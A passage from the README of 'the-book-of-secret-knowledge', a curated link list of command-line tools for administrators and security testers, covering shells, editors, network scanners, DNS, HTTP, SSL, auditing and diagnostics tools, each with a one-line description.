<p align="center"> <a href="https://github.com/trimstray/the-book-of-secret-knowledge"> <img src="https://github.com/trimstray/the-book-of-secret-knowledge/blob/master/static/img/the-book-of-secret-knowledge-preview.png" alt="Master"> </a> </p> <p align="center">"<i>Knowledge is powerful, be careful how you use it!</i>"</p> <h4 align="center">A collection of inspiring lists, manuals, cheatsheets, blogs, hacks, one-liners, cli/web tools, and more.</h4> <br> <p align="center"> <a href="https://github.com/trimstray/the-book-of-secret-knowledge/pulls"> <img src="https://img.shields.io/badge/PRs-welcome-brightgreen.svg?longCache=true" alt="Pull Requests"> </a> <a href="LICENSE.md"> <img src="https://img.shields.io/badge/License-MIT-lightgrey.svg?longCache=true" alt="MIT License"> </a> </p> <p align="center"> <a href="https://twitter.com/trimstray" target="_blank"> <img src="https://img.shields.io/twitter/follow/trimstray.svg?logo=twitter"> </a> </p> <div align="center"> <sub>Created by <a href="https://twitter.com/trimstray">trimstray</a> and <a href="https://github.com/trimstray/the-book-of-secret-knowledge/graphs/contributors">contributors</a> </div> <br> **** ## :notebook_with_decorative_cover: &nbsp;What is it? This repository is a collection of various materials and tools that I use every day in my work. It contains a lot of useful information gathered in one piece. It is an invaluable source of knowledge for me that I often look back on. ## :restroom: &nbsp;For whom? For everyone, really. Here everyone can find their favourite tastes. But to be perfectly honest, it is aimed towards System and Network administrators, DevOps, Pentesters, and Security Researchers. ## :information_source: &nbsp;Contributing If you find something which doesn't make sense, or something doesn't seem right, please make a pull request and please add valid and well-reasoned explanations about your changes or comments. A few simple rules for this project: - inviting and clear - not tiring - useful These below rules may be better: - easy to contribute to (Markdown + HTML ...) - easy to find (simple TOC, maybe it's worth extending them?) Url marked **\*** is temporary unavailable. Please don't delete it without confirming that it has permanently expired. Before adding a pull request, please see the **[contributing guidelines](.github/CONTRIBUTING.md)**. You should also remember about this: ```diff + This repository is not meant to contain everything but only good quality stuff. ``` All **suggestions/PR** are welcome! ### Code Contributors This project exists thanks to all the people who contribute. <a href="https://github.com/trimstray/the-book-of-secret-knowledge/graphs/contributors"><img src="https://opencollective.com/the-book-of-secret-knowledge/contributors.svg?width=890&button=false"></a> ### Financial Contributors <p align="left"> <a href="https://opencollective.com/the-book-of-secret-knowledge" alt="Financial Contributors on Open Collective"> <img src="https://img.shields.io/opencollective/backers/the-book-of-secret-knowledge?style=for-the-badge&color=FF4500&labelColor=A9A9A9"></a> </a> <a href="https://opencollective.com/the-book-of-secret-knowledge" alt="Financial Contributors on Open Collective"> <img src="https://img.shields.io/opencollective/sponsors/the-book-of-secret-knowledge?style=for-the-badge&color=FF4500&labelColor=A9A9A9"></a> </a> </p> ## :gift_heart: &nbsp;Support If this project is useful and important for you or if you really like _the-book-of-secret-knowledge_, you can bring **positive energy** by giving some **good words** or **supporting this project**. Thank you! ## :newspaper: &nbsp;RSS Feed & Updates GitHub exposes an [RSS/Atom](https://github.com/trimstray/the-book-of-secret-knowledge/commits.atom) feed of the commits, which may also be useful if you want to be kept informed about all changes. ## :ballot_box_with_check: &nbsp;ToDo - [ ] Add new stuff... - [ ] Add useful shell functions - [ ] Add one-liners for collection tools (eg. CLI Tools) - [ ] Sort order in lists New items are also added on a regular basis. ## :anger: &nbsp;Table of Contents Only main chapters: - **[CLI Tools](#cli-tools-toc)** - **[GUI Tools](#gui-tools-toc)** - **[Web Tools](#web-tools-toc)** - **[Systems/Services](#systemsservices-toc)** - **[Networks](#networks-toc)** - **[Containers/Orchestration](#containersorchestration-toc)** - **[Manuals/Howtos/Tutorials](#manualshowtostutorials-toc)** - **[Inspiring Lists](#inspiring-lists-toc)** - **[Blogs/Podcasts/Videos](#blogspodcastsvideos-toc)** - **[Hacking/Penetration Testing](#hackingpenetration-testing-toc)** - **[Your daily knowledge and news](#your-daily-knowledge-and-news-toc)** - **[Other Cheat Sheets](#other-cheat-sheets-toc)** - **[One-liners](#one-liners-toc)** - **[Shell functions](#shell-functions-toc)** ## :trident: &nbsp;The Book of Secret Knowledge (Chapters) #### CLI Tools &nbsp;[<sup>[TOC]</sup>](#anger-table-of-contents) ##### :black_small_square: Shells <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.gnu.org/software/bash/"><b>GNU Bash</b></a> - is an sh-compatible shell that incorporates useful features from the Korn shell and C shell.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.zsh.org/"><b>Zsh</b></a> - is a shell designed for interactive use, although it is also a powerful scripting language.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://tcl-lang.org/"><b>tclsh</b></a> - is a very powerful cross-platform shell, suitable for a huge range of uses.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/Bash-it/bash-it"><b>bash-it</b></a> - is a framework for using, developing and maintaining shell scripts and custom commands.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://ohmyz.sh/"><b>Oh My ZSH!</b></a> - is the best framework for managing your Zsh configuration.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/oh-my-fish/oh-my-fish"><b>Oh My Fish</b></a> - the Fishshell framework.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/starship/starship"><b>Starship</b></a> - the cross-shell prompt written in Rust.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/romkatv/powerlevel10k"><b>powerlevel10k</b></a> - is a fast reimplementation of Powerlevel9k ZSH theme.<br> </p> ##### :black_small_square: Shell plugins <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/rupa/z"><b>z</b></a> - tracks the folder you use the most and allow you to jump, without having to type the whole path.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/junegunn/fzf"><b>fzf</b></a> - is a general-purpose command-line fuzzy finder.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/zsh-users/zsh-autosuggestions"><b>zsh-autosuggestions</b></a> - Fish-like autosuggestions for Zsh.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/zsh-users/zsh-syntax-highlighting"><b>zsh-syntax-highlighting</b></a> - Fish shell like syntax highlighting for Zsh.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/unixorn/awesome-zsh-plugins"><b>Awesome ZSH Plugins</b></a> - A list of frameworks, plugins, themes and tutorials for ZSH.<br> </p> ##### :black_small_square: Managers <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://midnight-commander.org/"><b>Midnight Commander</b></a> - is a visual file manager, licensed under GNU General Public License.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/ranger/ranger"><b>ranger</b></a> - is a VIM-inspired filemanager for the console.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/jarun/nnn"><b>nnn</b></a> - is a tiny, lightning fast, feature-packed file manager.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.gnu.org/software/screen/"><b>screen</b></a> - is a full-screen window manager that multiplexes a physical terminal.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/tmux/tmux/wiki"><b>tmux</b></a> - is a terminal multiplexer, lets you switch easily between several programs in one terminal.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/peikk0/tmux-cssh"><b>tmux-cssh</b></a> - is a tool to set comfortable and easy to use functionality, clustering and synchronizing tmux-sessions.<br> </p> ##### :black_small_square: Text editors <p> &nbsp;&nbsp;:small_orange_diamond: <a href="http://ex-vi.sourceforge.net/"><b>vi</b></a> - is one of the most common text editors on Unix.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.vim.org/"><b>vim</b></a> - is a highly configurable text editor.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.gnu.org/software/emacs/"><b>emacs</b></a> - is an extensible, customizable, free/libre text editor, and more.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/zyedidia/micro"><b>micro</b></a> - is a modern and intuitive terminal-based text editor.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://neovim.io/"><b>neovim</b></a> - is a free open source, powerful, extensible and usable code editor.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.spacemacs.org/"><b>spacemacs</b></a> - a community-driven Emacs distribution.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://spacevim.org/"><b>spacevim</b></a> - a community-driven vim distribution.<br> </p> ##### :black_small_square: Files and directories <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/sharkdp/fd"><b>fd</b></a> - is a simple, fast and user-friendly alternative to find.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://dev.yorhel.nl/ncdu"><b>ncdu</b></a> - is an easy to use, fast disk usage analyzer.<br> </p> ##### :black_small_square: Network <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.putty.org/"><b>PuTTY</b></a> - is an SSH and telnet client, developed originally by Simon Tatham.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://mosh.org/"><b>Mosh</b></a> - is a SSH wrapper designed to keep a SSH session alive over a volatile connection.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://eternalterminal.dev/"><b>Eternal Terminal</b></a> - enables mouse-scrolling and tmux commands inside the SSH session.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://nmap.org/"><b>nmap</b></a> - is a free and open source (license) utility for network discovery and security auditing.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/zmap/zmap"><b>zmap</b></a> - is a fast single packet network scanner designed for Internet-wide network surveys.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/RustScan/RustScan"><b>Rust Scan</b></a> - to find all open ports faster than Nmap.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/robertdavidgraham/masscan"><b>masscan</b></a> - is the fastest Internet port scanner, spews SYN packets asynchronously.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/gvb84/pbscan"><b>pbscan</b></a> - is a faster and more efficient stateless SYN scanner and banner grabber.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.hping.org/"><b>hping</b></a> - is a command-line oriented TCP/IP packet assembler/analyzer.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/traviscross/mtr"><b>mtr</b></a> - is a tool that combines the functionality of the 'traceroute' and 'ping' programs in a single tool.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/mehrdadrad/mylg"><b>mylg</b></a> - utility which combines the functions of the different network probes in one diagnostic tool.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://netcat.sourceforge.net/"><b>netcat</b></a> - utility which reads and writes data across network connections, using the TCP/IP protocol.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.tcpdump.org/"><b>tcpdump</b></a> - is a powerful command-line packet analyzer.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.wireshark.org/docs/man-pages/tshark.html"><b>tshark</b></a> - is a tool that allows us to dump and analyze network traffic (wireshark cli).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://termshark.io/"><b>Termshark</b></a> - is a simple terminal user-interface for tshark.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/jpr5/ngrep"><b>ngrep</b></a> - is like GNU grep applied to the network layer.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://netsniff-ng.org/"><b>netsniff-ng</b></a> - is a Swiss army knife for your daily Linux network plumbing if you will.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/mechpen/sockdump"><b>sockdump</b></a> - dump unix domain socket traffic.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/google/stenographer"><b>stenographer</b></a> - is a packet capture solution which aims to quickly spool all packets to disk.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/sachaos/tcpterm"><b>tcpterm</b></a> - visualize packets in TUI.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/tgraf/bmon"><b>bmon</b></a> - is a monitoring and debugging tool to capture networking related statistics and prepare them visually.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://iptraf.seul.org/2.6/manual.html#installation"><b>iptraf-ng</b></a> - is a console-based network monitoring program for Linux that displays information about IP traffic.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/vergoh/vnstat"><b>vnstat</b></a> - is a network traffic monitor for Linux and BSD.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://iperf.fr/"><b>iPerf3</b></a> - is a tool for active measurements of the maximum achievable bandwidth on IP networks.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/Microsoft/Ethr"><b>ethr</b></a> - is a Network Performance Measurement Tool for TCP, UDP & HTTP.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/jwbensley/Etherate"><b>Etherate</b></a> - is a Linux CLI based Ethernet and MPLS traffic testing tool.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/mpolden/echoip"><b>echoip</b></a> - is a IP address lookup service.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/troglobit/nemesis"><b>Nemesis</b></a> - packet manipulation CLI tool; craft and inject packets of several protocols.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/packetfu/packetfu"><b>packetfu</b></a> - a mid-level packet manipulation library for Ruby.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://scapy.net/"><b>Scapy</b></a> - packet manipulation library; forge, send, decode, capture packets of a wide number of protocols.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/SecureAuthCorp/impacket"><b>impacket</b></a> - is a collection of Python classes for working with network protocols.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/arthepsy/ssh-audit"><b>ssh-audit</b></a> - is a tool for SSH server auditing.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://aria2.github.io/"><b>aria2</b></a> - is a lightweight multi-protocol & multi-source command-line download utility.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/x-way/iptables-tracer"><b>iptables-tracer</b></a> - observe the path of packets through the iptables chains.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/proabiral/inception"><b>inception</b></a> - a highly configurable tool to check for whatever you like against any number of hosts.<br> </p> ##### :black_small_square: Network (DNS) <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/farrokhi/dnsdiag"><b>dnsdiag</b></a> - is a DNS diagnostics and performance measurement tools.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/mschwager/fierce"><b>fierce</b></a> - is a DNS reconnaissance tool for locating non-contiguous IP space.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/subfinder/subfinder"><b>subfinder</b></a> - is a subdomain discovery tool that discovers valid subdomains for websites.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/aboul3la/Sublist3r"><b>sublist3r</b></a> - is a fast subdomains enumeration tool for penetration testers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/OWASP/Amass"><b>amass</b></a> - is tool that obtains subdomain names by scraping data sources, crawling web archives, and more.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/google/namebench"><b>namebench</b></a> - provides personalized DNS server recommendations based on your browsing history.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/blechschmidt/massdns"><b>massdns</b></a> - is a high-performance DNS stub resolver for bulk lookups and reconnaissance.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/guelfoweb/knock"><b>knock</b></a> - is a tool to enumerate subdomains on a target domain through a wordlist.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/DNS-OARC/dnsperf"><b>dnsperf</b></a> - DNS performance testing tools.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/jedisct1/dnscrypt-proxy"><b>dnscrypt-proxy 2</b></a> - a flexible DNS proxy, with support for encrypted DNS protocols.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/dnsdb/dnsdbq"><b>dnsdbq</b></a> - API client providing access to passive DNS database systems.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/looterz/grimd"><b>grimd</b></a> - fast dns proxy, built to black-hole internet advertisements and malware servers.<br> </p> ##### :black_small_square: Network (HTTP) <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://curl.haxx.se/"><b>curl</b></a> - is a command line tool and library for transferring data with URLs.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://gitlab.com/davidjpeacock/kurly"><b>kurly</b></a> - is an alternative to the widely popular curl program, written in Golang.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/jakubroztocil/httpie"><b>HTTPie</b></a> - is an user-friendly HTTP client.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/asciimoo/wuzz"><b>wuzz</b></a> - is an interactive cli tool for HTTP inspection.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/summerwind/h2spec"><b>h2spec</b></a> - is a conformance testing tool for HTTP/2 implementation.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/gildasio/h2t"><b>h2t</b></a> - is a simple tool to help sysadmins to hardening their websites.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/trimstray/htrace.sh"><b>htrace.sh</b></a> - is a simple Swiss Army knife for http/https troubleshooting and profiling.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/reorx/httpstat"><b>httpstat</b></a> - is a tool that visualizes curl statistics in a way of beauty and clarity.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/gchaincl/httplab"><b>httplab</b></a> - is an interactive web server.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://lynx.browser.org/"><b>Lynx</b></a> - is a text browser for the World Wide Web.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/browsh-org/browsh/"><b>Browsh</b></a> - is a fully interactive, real-time, and modern text-based browser.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/dhamaniasad/HeadlessBrowsers"><b>HeadlessBrowsers</b></a> - a list of (almost) all headless web browsers in existence.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://httpd.apache.org/docs/2.4/programs/ab.html"><b>ab</b></a> - is a single-threaded command line tool for measuring the performance of HTTP web servers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.joedog.org/siege-home/"><b>siege</b></a> - is an http load testing and benchmarking utility.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/wg/wrk"><b>wrk</b></a> - is a modern HTTP benchmarking tool capable of generating significant load.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/giltene/wrk2"><b>wrk2</b></a> - is a constant throughput, correct latency recording variant of wrk.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/tsenart/vegeta"><b>vegeta</b></a> - is a constant throughput, correct latency recording variant of wrk.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/codesenberg/bombardier"><b>bombardier</b></a> - is a fast cross-platform HTTP benchmarking tool written in Go.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/cmpxchg16/gobench"><b>gobench</b></a> - http/https load testing and benchmarking tool.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/rakyll/hey"><b>hey</b></a> - HTTP load generator, ApacheBench (ab) replacement, formerly known as rakyll/boom.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/tarekziade/boom"><b>boom</b></a> - is a script you can use to quickly smoke-test your web app deployment.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/shekyan/slowhttptest"><b>SlowHTTPTest</b></a> - is a tool that simulates some Application Layer Denial of Service attacks by prolonging HTTP.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/OJ/gobuster"><b>gobuster</b></a> - is a free and open source directory/file & DNS busting tool written in Go.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/ssllabs/ssllabs-scan"><b>ssllabs-scan</b></a> - command-line reference-implementation client for SSL Labs APIs.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/mozilla/http-observatory"><b>http-observatory</b></a> - Mozilla HTTP Observatory cli version.<br> </p> ##### :black_small_square: SSL <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.openssl.org/"><b>openssl</b></a> - is a robust, commercial-grade, and full-featured toolkit for the TLS and SSL protocols.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://gnutls.org/manual/html_node/gnutls_002dcli-Invocation.html"><b>gnutls-cli</b></a> - client program to set up a TLS connection to some other computer.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/nabla-c0d3/sslyze"><b>sslyze </b></a> - fast and powerful SSL/TLS server scanning library.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/rbsec/sslscan"><b>sslscan</b></a> - tests SSL/TLS enabled services to discover supported cipher suites.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/drwetter/testssl.sh"><b>testssl.sh</b></a> - testing TLS/SSL encryption anywhere on any port.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/mozilla/cipherscan"><b>cipherscan</b></a> - a very simple way to find out which SSL ciphersuites are supported by a target.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.tarsnap.com/spiped.html"><b>spiped</b></a> - is a utility for creating symmetrically encrypted and authenticated pipes between socket addresses.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/certbot/certbot"><b>Certbot</b></a> - is EFF's tool to obtain certs from Let's Encrypt and (optionally) auto-enable HTTPS on your server.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/FiloSottile/mkcert"><b>mkcert</b></a> - simple zero-config tool to make locally trusted development certificates with any names you'd like.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/square/certstrap"><b>certstrap</b></a> - tools to bootstrap CAs, certificate requests, and signed certificates.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/yassineaboukir/sublert"><b>Sublert</b></a> - is a security and reconnaissance tool to automatically monitor new subdomains.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/trimstray/mkchain"><b>mkchain</b></a> - open source tool to help you build a valid SSL certificate chain.<br> </p> ##### :black_small_square: Security <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/5/html/deployment_guide/ch-selinux"><b>SELinux</b></a> - provides a flexible Mandatory Access Control (MAC) system built into the Linux kernel.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://wiki.ubuntu.com/AppArmor"><b>AppArmor</b></a> - proactively protects the operating system and applications from external or internal threats.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/grapheneX/grapheneX"><b>grapheneX</b></a> - Automated System Hardening Framework.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/dev-sec/"><b>DevSec Hardening Framework</b></a> - Security + DevOps: Automatic Server Hardening.<br> </p> ##### :black_small_square: Auditing Tools <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.ossec.net/"><b>ossec</b></a> - actively monitoring all aspects of system activity with file integrity monitoring.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing"><b>auditd</b></a> - provides a way to track security-relevant information on your system.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.nongnu.org/tiger/"><b>Tiger</b></a> - is a security tool that can be use both as a security audit and intrusion detection system.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://cisofy.com/lynis/"><b>Lynis</b></a> - battle-tested security tool for systems running Linux, macOS, or Unix-based operating system.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/rebootuser/LinEnum"><b>LinEnum</b></a> - scripted Local Linux Enumeration & Privilege Escalation Checks.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/installation/rkhunter"><b>Rkhunter</b></a> - scanner tool for Linux systems that scans backdoors, rootkits and local exploits on your systems.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/hasherezade/pe-sieve"><b>PE-sieve</b></a> - is a light-weight tool that helps to detect malware running on the system.<br> </p> ##### :black_small_square: System Diagnostics/Debuggers <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/strace/strace"><b>strace</b></a> - diagnostic, debugging and instructional userspace utility for Linux.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://dtrace.org/blogs/about/"><b>DTrace</b></a> - is a performance analysis and troubleshooting tool.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://en.wikipedia.org/wiki/Ltrace"><b>ltrace</b></a> - is a library call tracer, used to trace calls made by programs to library functions.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/brainsmoke/ptrace-burrito"><b>ptrace-burrito</b></a> - is a friendly wrapper around ptrace.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/brendangregg/perf-tools"><b>perf-tools</b></a> - performance analysis tools based on Linux perf_events (aka perf) and ftrace.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/iovisor/bpftrace"><b>bpftrace</b></a> - high-level tracing language for Linux eBPF.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/draios/sysdig"><b>sysdig</b></a> - system exploration and troubleshooting tool with first class support for containers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.valgrind.org/"><b>Valgrind</b></a> - is an instrumentation framework for building dynamic analysis tools.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/gperftools/gperftools"><b>gperftools</b></a> - high-performance multi-threaded malloc() implementation, plus some performance analysis tools.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://nicolargo.github.io/glances/"><b>glances</b></a> - cross-platform system monitoring tool written in Python.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/hishamhm/htop"><b>htop</b></a> - interactive text-mode process viewer for Unix systems. It aims to be a better 'top'.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/aristocratos/bashtop"><b>bashtop</b></a> - Linux resource monitor written in pure Bash.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://nmon.sourceforge.net/pmwiki.php"><b>nmon</b></a> - a single executable for performance monitoring and data analysis.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.atoptool.nl/"><b>atop</b></a> - ASCII performance monitor. Includes statistics for CPU, memory, disk, swap, network, and processes.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://en.wikipedia.org/wiki/Lsof"><b>lsof</b></a> - displays in its output information about files that are opened by processes.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.brendangregg.com/flamegraphs.html"><b>FlameGraph</b></a> - stack trace visualizer.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/zevv/lsofgraph"><b>lsofgraph</b></a> - convert Unix lsof output to a graph showing FIFO and UNIX interprocess communication.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/mozilla/rr"><b>rr</b></a> - is a lightweight tool for recording, replaying and debugging execution of applications.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://pcp.io/index.html"><b>Performance Co-Pilot</b></a> - a system performance analysis toolkit.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/sharkdp/hexyl"><b>hexyl</b></a> - a command-line hex viewer.<br> </p> ##### :black_small_square: Log Analyzers <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/rcoh/angle-grinder"><b>angle-grinder</b></a> - slice and dice log files on the command line.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://lnav.org"><b>lnav</b></a> - log file navigator with search and automatic refresh.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://goaccess.io/"><b>GoAccess</b></a> - real-time web log analyzer and interactive viewer that runs in a terminal.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/lebinh/ngxtop"><b>ngxtop</b></a> - real-time metrics for nginx server.<br> </p> ##### :black_small_square: Databases <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/xo/usql"><b>usql</b></a> - universal command-line interface for SQL databases.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/dbcli/pgcli"><b>pgcli</b></a> - postgres CLI with autocompletion and syntax highlighting.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/dbcli/mycli"><b>mycli</b></a> - terminal client for MySQL with autocompletion and syntax highlighting.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/dbcli/litecli"><b>litecli</b></a> - SQLite CLI with autocompletion and syntax highlighting.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/osquery/osquery"><b>OSQuery</b></a> - is a SQL powered operating system instrumentation, monitoring, and analytics framework.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/ankane/pgsync"><b>pgsync</b></a> - sync data from one Postgres database to another.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/laixintao/iredis"><b>iredis</b></a> - a terminal client for redis with autocompletion and syntax highlighting.<br> </p> ##### :black_small_square: TOR <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/GouveaHeitor/nipe"><b>Nipe</b></a> - script to make Tor Network your default gateway.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/trimstray/multitor"><b>multitor</b></a> - a tool that lets you create multiple TOR instances with a load-balancing.<br> </p> ##### :black_small_square: Messengers/IRC Clients <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://irssi.org"><b>Irssi</b></a> - is a free open source terminal based IRC client.<br> 